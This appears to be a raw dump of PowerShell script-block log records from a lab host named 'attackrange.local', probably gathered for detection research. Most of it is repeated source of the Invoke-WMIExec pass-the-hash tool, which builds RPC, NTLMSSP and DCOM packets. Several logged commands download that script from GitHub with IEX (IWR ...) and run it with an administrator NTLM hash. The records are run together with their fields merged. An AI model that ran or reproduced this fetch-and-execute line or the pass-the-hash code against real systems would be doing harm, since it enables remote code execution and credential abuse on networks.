$packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = Newbb2b90ad-d4b0-4ee3-b469-f2f8ac4b6c3b 4104152150x0718604Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}30973898-936b-4d9f-9329-9b38c23f1189 4104152150x0718602Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}7720c556-2d68-41a7-beb0-34c81b597d53 4104132150x0718107Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local17function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) return $packet_DCOMRemQueryInterface } function New-PacketDCOMRemRelease { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) 2da73971-520d-44b4-87c1-bce5133e6d86 4104152150x0718101Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}6eb0fad7-e99e-4cb9-aa9e-abfe9004305c 4104152150x0718099Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}38afb503-b4d9-4a90-993e-474ee8b62f14 4104132150x0716775Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local18function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 